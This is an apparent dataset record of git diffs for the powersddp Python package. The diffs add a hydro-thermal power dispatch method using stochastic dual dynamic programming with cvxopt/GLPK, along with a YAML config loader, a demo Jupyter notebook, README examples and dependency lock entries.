+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0cd5776be891331a3e6b425b5abeab9596abea18435c5982191356f9b24ae731"},
+ {file = "pandas-1.3.2-cp39-cp39-win32.whl", hash = "sha256:66a95361b81b4ba04b699ecd2416b0591f40cd1e24c60a8bfe0d19009cfa575a"},
+ {file = "pandas-1.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:89f40e5d21814192802421df809f948247d39ffe171e45fe2ab4abf7bd4279d8"},
+ {file = "pandas-1.3.2.tar.gz", hash = "sha256:cbcb84d63867af3411fa063af3de64902665bb5b3d40b25b2059e40603594e87"},
+]
pandocfilters = [
{file = "pandocfilters-1.4.3.tar.gz", hash = "sha256:bc63fbb50534b4b1f8ebe1860889289e8af94a23bff7445259592df25a3906eb"},
]
@@ -1554,6 +1652,10 @@ pickleshare = [
{file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"},
{file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"},
]
+plotly = [
+ {file = "plotly-5.2.1-py2.py3-none-any.whl", hash = "sha256:bf7c8123541a2c6579c309561a8e1058c129434c67419651efbdc4922b11da8f"},
+ {file = "plotly-5.2.1.tar.gz", hash = "sha256:1575c34f87313818fc109a3d3326f2b91363d049c1e80cbf68561c8df24fb47c"},
+]
pluggy = [
{file = "pluggy-0.13.1-py2.py3-none-any.whl", hash = "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d"},
{file = "pluggy-0.13.1.tar.gz", hash = "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0"},
@@ -1769,6 +1871,10 @@ sniffio = [
{file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"},
{file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"},
]
+tenacity = [
+ {file = "tenacity-8.0.1-py3-none-any.whl", hash = "sha256:f78f4ea81b0fabc06728c11dc2a8c01277bfc5181b321a4770471902e3eb844a"},
+ {file = "tenacity-8.0.1.tar.gz", hash = "sha256:43242a20e3e73291a28bcbcacfd6e000b02d3857a9a9fff56b297a27afdc932f"},
+]
terminado = [
{file = "terminado-0.11.0-py3-none-any.whl", hash = "sha256:221eef83e6a504894842f7dccfa971ca2e98ec22a8a9118577e5257527674b42"},
{file = "terminado-0.11.0.tar.gz", hash = "sha256:1e01183885f64c1bba3cf89a5a995ad4acfed4e5f00aebcce1bf7f089b0825a1"},
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
index d8e72df..69a4181 100644
--- a/powersddp/core/system.py
+++ b/powersddp/core/system.py
@@ -1,59 +1,208 @@
"""Module to handle classes and methods related to a selected Power System.
-This module should follow a systems.json file standar:
-{
- "{name}": {
- "shedding_cost": float,
- "load": [float, float, float],
- "n_disc": int,
- "n_est": int,
- "n_cen": int,
- "generation_units": [
- {"type": "hydro",
- "name": "str",
- "v_max": float,
- "v_min": float,
- "prod": float,
- "flow_max": float,
- "inflow_scenarios":[<list>]},
- {"type": "thermal", "name": "str", "capacity": "float", "cost": float},
- ...
- ]
- }
-}
-Where {name} should be changed to whatever name you may choose to your system.
-For example, 'Test01'. Check README.md file.
+This module should follow a systems.yml file standard:
+
+# system.yml
+load: [float,float,float]
+discretizations: int
+stages: int
+scenarios: int
+outage_cost: float
+hydro-units: !include system-hydro.yml
+thermal-units: !include system-thermal.yml
+
+# system-hydro.yml
+-
+ name: str
+ v_max: float
+ v_min: float
+ prod: float
+ flow_max: float
+ inflow_scenarios:
+ - list<float>
+ - list<float>
+ - list<float>
+
+# system-thermal.yml
+-
+ name: str
+ capacity: float
+ cost: float
"""
-from abc import ABC, abstractclassmethod
+from abc import ABC, abstractmethod
+from itertools import product
+import numpy as np
+import pandas as pd
import yaml
-from powersddp.util._yml import YmlLoader
-
-YmlLoader.add_constructor("!include", YmlLoader.include)
+from powersddp.utils._yml import YmlLoader
+from powersddp.utils._solver import sdp, plot_future_cost_function
class PowerSystemInterface(ABC):
- @abstractclassmethod
+ @abstractmethod
def load_system(self):
raise NotImplementedError
+ @abstractmethod
+ def dispatch(self):
+ raise NotImplementedError
+
class PowerSystem(PowerSystemInterface):
- def __init__(self, verbose: bool = False, **kwargs):
- self.__verbose = verbose
- self.__dict__.update(kwargs)
- self.load_system()
+ """Singleton Class to instantiate a Power System.
- def load_system(self):
- if "path" in self.__dict__:
- with open(self.path, "r") as f:
- data = yaml.load(f, YmlLoader)
-
- self.data = data
- if self.__verbose:
- print("System loaded from {} file".format(self.path))
- elif "data" in self.__dict__:
- if self.__verbose:
- print("System loaded from 'data' payload")
+ A Power System is defined based on set of parameters, including the systems parameters
+ and all the generation units. Both thermal and hydro.
+
+ Note: Either initialize a Power System by providing the path to a systems.yml file or
+ by providing a dictionary containing all the necessary data.
+
+ Attributes
+ ----------
+ path : str, optional
+ Path to the systems.yml file
+ data : dict, optional
+ Dictionary containing all of the power system parameters, including the generation units.
+
+ """
+
+ def __init__(self, path: str = None, data: dict = None):
+ """__init__ method.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the systems.yml file.
+ data : :obj:`dict`, optional
+ Description of `param2`. Multiple
+ lines are supported.
+ param3 : :obj:`int`, optional
+ Dictionary containing all of the power system parameters, including the generation units.
+
+ """
+
+ self.load_system(path=path, data=data)
+
+ def load_system(self, *, path: str = None, data: dict = None):
+ """Loads a Power System from file or dictionary payload
+
+ A Power System data be loaded from both file or dictionary payload. In case both
+ positional parameters are suplied the file path will have priority and data payload
+ will be ignored.
+
+ PowerSystem loads the data by default during initialization, but can be reloaded ad-hoc.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the .yml file containing the system data.
+ data : dict, optional
+ Dictionary containing the structured data of the system.
+
+ """
+ if path:
+ with open(path, "r") as f:
+ self.data = yaml.load(f, YmlLoader)
+ elif data:
+ self.data = data
else:
- raise NotImplementedError
+ raise ValueError(
+ "load_system() should receive path=str or data=dict as arguments"
+ )
+
+ def dispatch(
+ self, *, solver: str = "sdp", plot: bool = False, verbose: bool = False
+ ) -> pd.DataFrame:
+ """Solves a financial dispatch of a Power System class
+
+ Once instantiated a Power System can deploy the generation units based on the
+ minimization of an objective function. This method iterates over every stage
+ and scenario of the Power System, finding the optimal solution of the problem
+ using the Dual Stochastic Dynamic Programming technique.
+
+ Parameters
+ ----------
+ plot : bool, optional
+ Boolean to plot the future cost function of every stage.
+ verbose : bool, optional
+ Dictionary containing the structured data of the system.
+
+ Returns
+ -------
+ operation : pandas.DataFrame
+ A Dataframe containing the operation on every stage and scenario.
+
+ """
+
+ n_hgu = len(self.data["hydro-units"])
+
+ step = 100 / (self.data["discretizations"] - 1)
+ discretizations = list(product(np.arange(0, 100 + step, step), repeat=n_hgu))
+
+ operation = []
+ cuts = [] # type: ignore
+ for stage in range(self.data["stages"], 0, -1):
+ for discretization in discretizations:
+
+ v_i = []
+ # For Every Hydro Unit
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ v_i.append(
+ hgu["v_min"]
+ + (hgu["v_max"] - hgu["v_min"]) * discretization[i] / 100
+ )
+
+ # For Every Scenario
+ average = 0.0
+ avg_water_marginal_cost = [0 for _ in self.data["hydro-units"]]
+ for scenario in range(self.data["scenarios"]):
+ inflow = []
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ inflow.append(hgu["inflow_scenarios"][stage - 1][scenario])
+
+ if verbose:
+ print(
+ "STAGE: {} | DISC.: {}% | SCENARIO: {}".format(
+ stage, int(discretization[0]), scenario
+ )
+ )
+ result = sdp(
+ system_data=self.data,
+ v_i=v_i,
+ inflow=inflow,
+ cuts=cuts,
+ stage=stage + 1,
+ verbose=verbose,
+ )
+ average += result["total_cost"]
+ for i, hgu in enumerate(result["hydro_units"]):
+ avg_water_marginal_cost[i] += hgu["water_marginal_cost"]
+
+ # Calculating the average of the scenarios
+ average = average / self.data["scenarios"]
+ coef_b = average
+ for i, hgu in enumerate(result["hydro_units"]):
+ # ! Invert the coefficient because of the minimization problem inverts the signal
+ avg_water_marginal_cost[i] = (
+ -avg_water_marginal_cost[i] / self.data["scenarios"]
+ )
+ coef_b -= v_i[i] * avg_water_marginal_cost[i]
+
+ cuts.append(
+ {"stage": stage, "coef_b": coef_b, "coefs": avg_water_marginal_cost}
+ )
+ operation.append(
+ {
+ "stage": stage,
+ "storage_percentage": "{}%".format(int(discretization[i])),
+ "initial_volume": v_i[0],
+ "average_cost": round(average, 2),
+ }
+ )
+ operation_df = pd.DataFrame(operation)
+
+ if n_hgu == 1 and plot:
+ plot_future_cost_function(operation=operation_df)
+
+ return operation_df
diff --git a/powersddp/util/__init__.py b/powersddp/utils/__init__.py
similarity index 100%
rename from powersddp/util/__init__.py
rename to powersddp/utils/__init__.py
diff --git a/powersddp/utils/_solver.py b/powersddp/utils/_solver.py
new file mode 100644
index 0000000..a2d597f
--- /dev/null
+++ b/powersddp/utils/_solver.py
@@ -0,0 +1,215 @@
+"""Utilitarian module to solve power systems.
+"""
+
+
+import cvxopt.modeling as model
+import pandas as pd
+import plotly.graph_objects as go
+
+from cvxopt import solvers
+from plotly.subplots import make_subplots
+
+solvers.options["glpk"] = dict(msg_lev="GLP_MSG_OFF")
+
+
+# Unique Linear Programming
+def ulp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Unique Linear Programming Solver
+
+ Parameters
+ ----------
+ system_data : dict,
+ Dict containing data structured as used to instantiate a PowerSystem.
+ v_i : list
+ List containing the initial volume of the Hydro Units, for each
+ v_i : list
+ List containing the inflow to the Hydro Units
+ verbose : bool, optional
+ Dictionary containing the structured data of the system.
+ """
+
+ return None
+
+
+# Stochastic Dual Programming
+def sdp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Stochastic Dual Programming Solver
+
+ Method to abstract the Dual Stochastic Programming solver applied to the power system
+ problem.
+
+ Parameters
+ ----------
+ system_data : dict,
+ Dict containing data structured as used to instantiate a PowerSystem.
+ v_i : list
+ List containing the initial volume of the Hydro Units, for each
+ v_i : list
+ List containing the inflow to the Hydro Units
+ verbose : bool, optional
+ Dictionary containing the structured data of the system.
+
+ Returns
+ -------
+ operation : dict
+ A dictionary representing the operation
+ """
+
+ n_tgu = len(system_data["thermal-units"])
+ n_hgu = len(system_data["hydro-units"])
+
+ ## Initializing Model Variables
+ v_f = model.variable(n_hgu, "Final Volume")
+ v_t = model.variable(n_hgu, "Turbined Flow")
+ v_v = model.variable(n_hgu, "Shed Flow")
+ g_t = model.variable(n_tgu, "Power Generated")
+ shortage = model.variable(1, "Power Shortage")
+ alpha = model.variable(1, "Future Cost")
+
+ ## Objective Function
+ objective_function = 0
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ objective_function += tgu["cost"] * g_t[i]
+ objective_function += system_data["outage_cost"] * shortage[0]
+ for i, _ in enumerate(system_data["hydro-units"]):
+ objective_function += 0.01 * v_v[i]
+ objective_function += 1.0 * alpha[0]
+
+ ## Constraints
+ ### Hydro Balance
+ constraints = []
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i])
+
+ ### Load Supply
+ supplying = 0
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ supplying += hgu["prod"] * v_t[i]
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ supplying += g_t[i]
+
+ supplying += shortage[0]
+
+ constraints.append(supplying == system_data["load"][stage - 2])
+
+ ### Bounds
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] >= hgu["v_min"])
+ constraints.append(v_f[i] <= hgu["v_max"])
+ constraints.append(v_t[i] >= 0)
+ constraints.append(v_t[i] <= hgu["flow_max"])
+ constraints.append(v_v[i] >= 0)
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ constraints.append(g_t[i] >= 0)
+ constraints.append(g_t[i] <= tgu["capacity"])
+
+ constraints.append(shortage[0] >= 0)
+ constraints.append(alpha[0] >= 0)
+
+ ### Cut constraint (Future cost function of forward stage)
+ for cut in cuts:
+ if cut["stage"] == stage:
+ equation = 0
+ for hgu in range(n_hgu):
+ equation += float(cut["coefs"][hgu]) * v_f[hgu]
+ equation += float(cut["coef_b"]) # type: ignore
+ constraints.append(alpha[0] >= equation)
+
+ ## Solving
+ opt_problem = model.op(objective=objective_function, constraints=constraints)
+ opt_problem.solve(format="dense", solver="glpk")
+
+ ## Print
+ if verbose:
+ print("--------------------------------------")
+ print("Total Cost: ${}".format(round(objective_function.value()[0], 2))) # type: ignore
+ print("Future Cost: ${}".format(round(alpha[0].value()[0], 2)))
+ print("--------------------------------------")
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_f.name, v_f[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_t.name, v_t[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_v.name, v_v[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} $/hm3".format(
+ i, "Water Cost", constraints[i].multiplier.value[0]
+ )
+ )
+ print("--------------------------------------")
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ print("TGU {} | {}: {:>7.2f} MWmed".format(i, g_t.name, g_t[i].value()[0]))
+ print("--------------------------------------")
+
+ print(
+ """{}: {:.2f} MWmed\nMarginal Cost: {:.2f}\n======================================\n
+ """.format(
+ shortage.name,
+ shortage[0].value()[0],
+ constraints[n_hgu].multiplier.value[0],
+ )
+ )
+
+ return {
+ "shortage": shortage[0].value()[0],
+ "operational_marginal_cost": constraints[n_hgu].multiplier.value[0],
+ "total_cost": objective_function.value()[0], # type: ignore
+ "future_cost": alpha[0].value()[0],
+ "hydro_units": [
+ {
+ "v_f": v_f[i].value()[0],
+ "v_t": v_t[i].value()[0],
+ "v_v": v_v[i].value()[0],
+ "water_marginal_cost": constraints[i].multiplier.value[0],
+ }
+ for i in range(n_hgu)
+ ],
+ "thermal_units": [{"g_t": g_t[i].value()[0]} for i in range(n_tgu)],
+ }
+
+
+def plot_future_cost_function(operation: pd.DataFrame):
+
+ n_stages = len(operation["stage"].unique())
+
+ fig = make_subplots(rows=n_stages, cols=1)
+
+ for i, stage in enumerate(operation["stage"].unique()):
+ stage_df = operation.loc[operation["stage"] == stage]
+ fig.add_trace(
+ go.Scatter(
+ x=stage_df["initial_volume"],
+ y=stage_df["average_cost"],
+ mode="lines",
+ name="Stage {}".format(stage),
+ ),
+ row=i + 1,
+ col=1,
+ )
+
+ fig.update_xaxes(title_text="Final Volume [hm3]")
+ fig.update_yaxes(title_text="$/MW")
+
+ fig.update_layout(height=300 * n_stages, title_text="Future Cost Function")
+ fig.show()
diff --git a/powersddp/util/_yml.py b/powersddp/utils/_yml.py
similarity index 62%
rename from powersddp/util/_yml.py
rename to powersddp/utils/_yml.py
index b0b21b8..72f1c7a 100644
--- a/powersddp/util/_yml.py
+++ b/powersddp/utils/_yml.py
@@ -1,8 +1,17 @@
+"""Utilitarian module to deal with .yml files
+"""
+
import yaml
import os
class YmlLoader(yaml.SafeLoader):
+ """Class to extend yaml loader capabilities
+
+ Attributes
+ ----------
+ """
+
def __init__(self, stream):
self._root = os.path.split(stream.name)[0]
@@ -11,7 +20,10 @@ def __init__(self, stream):
def include(self, node):
- filename = os.path.join(self._root, self.construct_scalar(node))
+ filename = os.path.join(self._root, self.construct_scalar(node)) # type: ignore
with open(filename, "r") as f:
return yaml.load(f, YmlLoader)
+
+
+YmlLoader.add_constructor("!include", YmlLoader.include)
diff --git a/pyproject.toml b/pyproject.toml
index 31928aa..df3a553 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -12,6 +12,9 @@ exclude = ["Makefile","README.rst","Notebook.ipynb"]
python = "^3.8"
PyYAML = "^5.4.1"
cvxopt = "^1.2.6"
+numpy = "^1.21.1"
+pandas = "^1.3.2"
+plotly = "^5.2.1"
[tool.poetry.dev-dependencies]
pytest = "^5.2"
| Implement a Dispach method for the PowerSystem object
## Description
Once initialized a Power System can be optimally dispatched based on the minimization of an Objective Function.
## To Do
- Create `PowerSystem.dispatch()` method to solve the Power System based on initial parameters of `v_i` and `inflow`
- The output should be a dictionary and a `verbose` boolean parameter could be passed to allow the execution to run in a verbose mode printing the steps and outputs.
| 2021-08-22T22:45:27 | 0.0 | [] | [] |
|||
ettoreaquino/powersddp | ettoreaquino__powersddp-3 | 829615fd5e85be00f0e81c2eec464134c2623a8f | diff --git a/Notebook.ipynb b/Notebook.ipynb
new file mode 100644
index 0000000..18782e2
--- /dev/null
+++ b/Notebook.ipynb
@@ -0,0 +1,310 @@
+{
+ "cells": [
+ {
+ "cell_type": "code",
+ "execution_count": 1,
+ "id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "System loaded from system.yml file\n"
+ ]
+ }
+ ],
+ "source": [
+ "from powersddp.system import PowerSystem\n",
+ "import cvxopt.modeling as model\n",
+ "\n",
+ "data = {'load': [50, 50, 50],\n",
+ " 'discretizations': 3,\n",
+ " 'stages': 3,\n",
+ " 'scenarios': 2,\n",
+ " 'shedding_cost': 500,\n",
+ " 'hydro-units': [{'name': 'HU1',\n",
+ " 'v_max': 100,\n",
+ " 'v_min': 20,\n",
+ " 'prod': 0.95,\n",
+ " 'flow_max': 60,\n",
+ " 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],\n",
+ " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
+ " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
+ "\n",
+ "TestSystem = PowerSystem(path='system.yml')"
+ ]
+ },
+ {
+ "cell_type": "markdown",
+ "id": "af0e4777-071d-45f7-b711-f7314f64c94b",
+ "metadata": {},
+ "source": [
+ "## Decision Variables\n",
+ "\n",
+ "### Hydro Units\n",
+ "- Final volume $v_f$: The final volume of the reservoir after the operational period\n",
+ "- Turbined flow $v_t$: The ammount of water that was turbined during the period\n",
+ "- Shed volume $v_v$: The ammount of water that was shed in the period\n",
+ "- Initial volume $v_i$\n",
+ "- Influx $afl$\n",
+ "\n",
+ "### Thermal Units\n",
+ "- total generation $g_t$: The total amount of generation provided by the unit during the period\n",
+ "\n",
+ "### System\n",
+ "- Outage $def$: The total ammount of power that will not be delivered by the system\n",
+ "\n",
+ "\n",
+ "\n",
+ "## The Objective Function\n",
+ "\n",
+ "Assuming a problem with 3 generation units (2 TGUs and 1 HGU) let's write down the Objetive Function of our problem:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v\\\\\n",
+ " \\textrm{s.t.} \\quad & \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f = v_i + afl - v_t \\\\\n",
+ " \\textrm{load supplying} \\quad & \\rho\\cdot v_t + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
+ " \\textrm{constraints} \\quad & \\\\\n",
+ " & v_{f_{min}}\\leq v_f \\leq v_{f_{max}}\\\\\n",
+ " & v_{t_{min}}\\leq v_t \\leq v_{t_{max}}\\\\\n",
+ " & v_{v_{min}}\\leq v_v \\leq v_{v_{max}}\\\\\n",
+ " & g_{t_{min}}\\leq g_t^\\ast \\leq g_{t_{max}}\\\\\n",
+ " ^\\ast \\textrm{for each TGU}& \n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "> Later we shall also add the Future Cost Function $\\alpha$ in the minimization function "
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 4,
+ "id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
+ "metadata": {},
+ "outputs": [],
+ "source": [
+ "def dispatch(system, v_i, inflow):\n",
+ " n_tgu = len(system.data['thermal-units'])\n",
+ " n_hgu = len(system.data['hydro-units'])\n",
+ "\n",
+ "\n",
+ " ## Initializing Model Variables\n",
+ " v_f = model.variable(n_hgu, \"Final Volume of the Hydro Unit\")\n",
+ " v_t = model.variable(n_hgu, \"Turbined Flow of the Hydro Unit\")\n",
+ " v_v = model.variable(n_hgu, \"Shed flow of the Hydro Unit\")\n",
+ " g_t = model.variable(n_tgu, \"Power generated by the Thermal Unit\")\n",
+ " deficit = model.variable(1, \"Power deficit\")\n",
+ "\n",
+ " ## Objective Function\n",
+ " fob = 0\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " fob += tgu[\"cost\"]*g_t[i]\n",
+ " fob+=TestSystem.data['outage_cost']*deficit[0]\n",
+ " for i, _ in enumerate(system.data['hydro-units']):\n",
+ " fob += 0.01*v_v[i]\n",
+ "\n",
+ " ## Hydro Balance\n",
+ " constraints = []\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " constraints.append( v_f[i] == v_i + inflow - v_t[i] - v_v[i] )\n",
+ "\n",
+ " supplying = 0\n",
+ " ## Load Supplying\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " supplying += hgu[\"prod\"] * v_t[i]\n",
+ "\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " supplying += g_t[i]\n",
+ "\n",
+ " supplying += deficit[0]\n",
+ "\n",
+ " constraints.append(supplying == system.data['load'][2])\n",
+ "\n",
+ " ## Constraints\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " constraints.append(v_f[i] >= hgu[\"v_min\"])\n",
+ " constraints.append(v_f[i] <= hgu[\"v_max\"])\n",
+ " constraints.append(v_t[i] >= 0)\n",
+ " constraints.append(v_t[i] <= hgu[\"flow_max\"])\n",
+ " constraints.append(v_v[i] >= 0)\n",
+ "\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " constraints.append(g_t[i] >= 0)\n",
+ " constraints.append(g_t[i] <= tgu[\"capacity\"])\n",
+ "\n",
+ " constraints.append(deficit[0] >= 0)\n",
+ " \n",
+ " opt_problem = model.op(objective=fob, constraints=constraints)\n",
+ " opt_problem.solve(format='dense',solver='glpk')\n",
+ "\n",
+ " print(\"Total Cost: {}\".format(fob.value()))\n",
+ "\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
+ "\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
+ "\n",
+ " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
+ "\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
+ "\n",
+ " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 5,
+ "id": "17fb0a0c-5a87-41fb-a645-1434a65c02d4",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "Total Cost: [ 7.67e+03]\n",
+ "\n",
+ "Final Volume of the Hydro Unit 0 is [ 2.00e+01]\n",
+ " hm3\n",
+ "Turbined Flow of the Hydro Unit 0 is [ 1.10e+01]\n",
+ " hm3\n",
+ "Shed flow of the Hydro Unit 0 is [ 0.00e+00]\n",
+ " hm3\n",
+ "Power generated by the Thermal Unit 0 is [ 1.50e+01]\n",
+ " MWmed\n",
+ "Power generated by the Thermal Unit 1 is [ 1.00e+01]\n",
+ " MWmed\n",
+ "Power deficit is [ 1.45e+01]\n",
+ " MWmed\n",
+ "The cost of water at Hydro Unit 0 is [ 4.75e+02]\n",
+ " hm3\n",
+ "The Marginal Cost is: [-5.00e+02]\n",
+ "\n",
+ "GLPK Simplex Optimizer, v4.65\n",
+ "12 rows, 6 columns, 17 non-zeros\n",
+ " 0: obj = 0.000000000e+00 inf = 1.010e+02 (3)\n",
+ " 5: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
+ "* 6: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
+ "OPTIMAL LP SOLUTION FOUND\n"
+ ]
+ }
+ ],
+ "source": [
+ "system = TestSystem\n",
+ "v_i = 20\n",
+ "inflow = 11\n",
+ "\n",
+ "dispatch(system=system, v_i=v_i, inflow=inflow)"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 9,
+ "id": "108fdcb5-9ce2-49db-b487-eeaf90ec0e24",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "System Load: [50, 50, 50]\n",
+ "Number of HGUs: 1\n",
+ "Number of TGUs: 2\n"
+ ]
+ }
+ ],
+ "source": [
+ "import powersddp\n",
+ "\n",
+ "system = powersddp.PowerSystem(path='system.yml')\n",
+ "\n",
+ "print(\"System Load: {}\\n\"\n",
+ " \"Number of HGUs: {}\\n\"\n",
+ " \"Number of TGUs: {}\".format(system.data['load'],\n",
+ " len(system.data['hydro-units']),\n",
+ " len(system.data['thermal-units'])))"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 1,
+ "id": "07837a84-da91-47bf-a749-d4292fde6d57",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "System Load: [50, 50, 50]\n",
+ "Number of HGUs: 1\n",
+ "Number of TGUs: 2\n"
+ ]
+ }
+ ],
+ "source": [
+ "import powersddp\n",
+ "\n",
+ "payload = {'load': [50, 50, 50],\n",
+ " 'discretizations': 3,\n",
+ " 'stages': 3,\n",
+ " 'scenarios': 2,\n",
+ " 'outage_cost': 500,\n",
+ " 'hydro-units': [{'name': 'HU1',\n",
+ " 'v_max': 100,\n",
+ " 'v_min': 20,\n",
+ " 'prod': 0.95,\n",
+ " 'flow_max': 60,\n",
+ " 'inflow_scenarios': [[23, 16],\n",
+ " [19, 14],\n",
+ " [15, 11]]}],\n",
+ " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
+ " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
+ "\n",
+ "system = powersddp.PowerSystem(data=payload)\n",
+ "\n",
+ "print(\"System Load: {}\\n\"\n",
+ " \"Number of HGUs: {}\\n\"\n",
+ " \"Number of TGUs: {}\".format(system.data['load'],\n",
+ " len(system.data['hydro-units']),\n",
+ " len(system.data['thermal-units'])))"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": null,
+ "id": "db680eea-a46e-4f24-a739-aae4117bb19e",
+ "metadata": {},
+ "outputs": [],
+ "source": []
+ }
+ ],
+ "metadata": {
+ "kernelspec": {
+ "display_name": "Python 3 (ipykernel)",
+ "language": "python",
+ "name": "python3"
+ },
+ "language_info": {
+ "codemirror_mode": {
+ "name": "ipython",
+ "version": 3
+ },
+ "file_extension": ".py",
+ "mimetype": "text/x-python",
+ "name": "python",
+ "nbconvert_exporter": "python",
+ "pygments_lexer": "ipython3",
+ "version": "3.8.6"
+ }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 5
+}
diff --git a/README.md b/README.md
index e200220..9294885 100644
--- a/README.md
+++ b/README.md
@@ -18,4 +18,52 @@ A special thank should be given to professor **André Marcato**. This project do
pip install powersddp
```
+## Example
+
+There are two ways of initializing a `Power System`. Either by providing a `.yml` file, or by passing a dictionary as an initialization data. Both are depicted bellow:
+
+> **Note:** When using the file input method (`.yml` format) check the [example](system.yml) of how to declare the parameters.
+
+
+### Initializing a `PowerSystem`
+```Python
+import powersddp
+
+system = powersddp.PowerSystem(path='system.yml')
+
+print("System Load: {}\n"
+ "Number of HGUs: {}\n"
+ "Number of TGUs: {}".format(system.data['load'],
+ len(system.data['hydro-units']),
+ len(system.data['thermal-units'])))
+```
+
+```Python
+import powersddp
+
+payload = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16],
+ [19, 14],
+ [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+system = powersddp.PowerSystem(data=payload)
+
+print("System Load: {}\n"
+ "Number of HGUs: {}\n"
+ "Number of TGUs: {}".format(system.data['load'],
+ len(system.data['hydro-units']),
+ len(system.data['thermal-units'])))
+```
+
<!-- <img src="https://render.githubusercontent.com/render/math?math=e^{i \pi} = -1"> -->
diff --git a/poetry.lock b/poetry.lock
index ab3d041..7944ec3 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -1,3 +1,20 @@
